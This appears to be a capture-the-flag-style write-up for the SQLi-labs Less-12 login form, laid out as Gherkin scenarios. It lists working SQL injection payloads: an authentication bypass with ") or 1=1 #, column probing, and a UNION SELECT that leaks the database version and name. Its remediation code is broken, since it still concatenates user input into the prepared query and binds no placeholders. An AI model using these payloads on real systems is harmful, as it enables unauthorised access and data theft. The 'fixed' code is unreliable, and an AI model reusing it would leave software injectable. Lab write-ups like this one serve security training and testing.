## Version 2.0
## language: en

Feature: SQL Injection Level 12
  TOE:
    SQLI-labs
  Category:
    SQL Injection -  POST-Error-Based-Double-Quotes
  Location:
    http://localhost/sqlilabs/Less-12/ - id(field)
  CWE:
    CWE-89: SQL Injection
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Check the website vulnerability against SQL Injection
  Recommendation:
    Use prepared Statements

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Windows OS      | 10            |
    | Chrome          | 80.0.3987.100 |
  TOE information:
    Given I am accessing to the website
    And the server is running MySQL version 5.7.28
    And PHP version 5.6.40
    And is running on localhost

  Scenario: Normal use case
    Given I am on the main page
    And I can see a form with "Username" and "Password"
    When I do not fill the inputs
    Then A new message appears
    """
    LOGIN ATTEMPT FILED
    """

  Scenario: Static detection
    Given I access to the source code
    When I look for the ralated code
    Then I find the related query
    """
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=($uname)
    and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    """
    When I analize the code
    Then The parameters are bundle into double quotes
    And The query does not have prepared statements and is vulnerable to sql injection

  Scenario: Dynamic detection
    Given The website fom recibe the "Username" and "Password"
    When I use "\" as the Username value
    Then I can see the error message
    """
    You have an error in your SQL syntax; check the manual that corresponds
    to your MySQL server version for the right syntax to use near '"\") and
    password=("") LIMIT 0,1' at line 1
    """
    And I realize the id parameter is bundle by double quotes
    When I inject the code into the "Username" input
    """
    ") or 1=1 Limit 0,1 #
    """
    Then I can see the message
    """
    Successfully logged in
    """

  Scenario: Exploitation
    Given The web site is vulnerable
    When I inject the value into "Username"
    """
    ") group by 3 #
    """
    Then I get the error message with the user
    """
    Unknown column '3' in 'group statement'
    """
    When I inject the value into "Username"
    """
    ") group by 2 #
    """
    Then I don not get a error message
    When I inject the query into "Username"
    """
    ") union select version(), database() #
    """
    Then I get the version and database name [evidence](evidence.png)
    """
    Your Login name:5.7.28
    Your Password:security
    """
    And The website is vulnerable to "sql injection"

  Scenario: Remediation
    Given The web site is vulnerable against sql injection
    And The code does not have prepared statements
    When The web site is using the vulnerable query
    Then The code must be replace with
    """
    $stmt = $mysqli->prepare("SELECT username, password FROM users WHERE
            username=($uname) and password=($passwd) LIMIT 0,1");
    $stmt->bind_param("ss", $uname, $passwd);
    $stmt->execute();
    $stmt->close();
    """
    And The query could be shielded against sql injection

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      6.5/10 (Medium) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      6.2/10 (Medium) - E:H/RL:O/RC:C
    Environmental: Unique and relevant attributes to a specific user environment
      5.5/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-09-25
